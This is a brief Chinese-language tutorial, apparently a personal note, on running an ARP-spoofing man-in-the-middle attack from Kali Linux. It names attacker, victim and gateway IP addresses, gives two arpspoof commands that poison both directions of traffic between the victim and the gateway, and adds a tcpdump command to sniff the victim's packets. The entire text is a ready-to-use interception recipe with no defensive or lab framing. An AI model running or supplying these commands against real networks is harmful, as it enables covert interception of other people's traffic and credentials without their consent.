kail:172.16.1.254

被***者:172.16.1.103

网关:172.16.1.1


kail linux  打开两个终端,

1、arpspoof -i wlan0 -t 172.16.1.103 172.16.1.1  

      将 172.16.1.103 发给网关172.16.1.1的数据先发送到本机,再由本机进行转发,前提是本机已经开启路由。

2、arpspoof -i wlan0 -t 172.16.1.1 172.16.1.103 

      将 网关172.16.1.1 发往172.16.1.103 的数据先发送到本机,再由本机进行转发。

 通过以上两条命令可以保证172.16.1.103 的请求和回包都会经过本机。进而可以通过本机上的嗅探工具进行分析。


最简单的tcpdump -nnvvi wlan0 host 172.16.1.103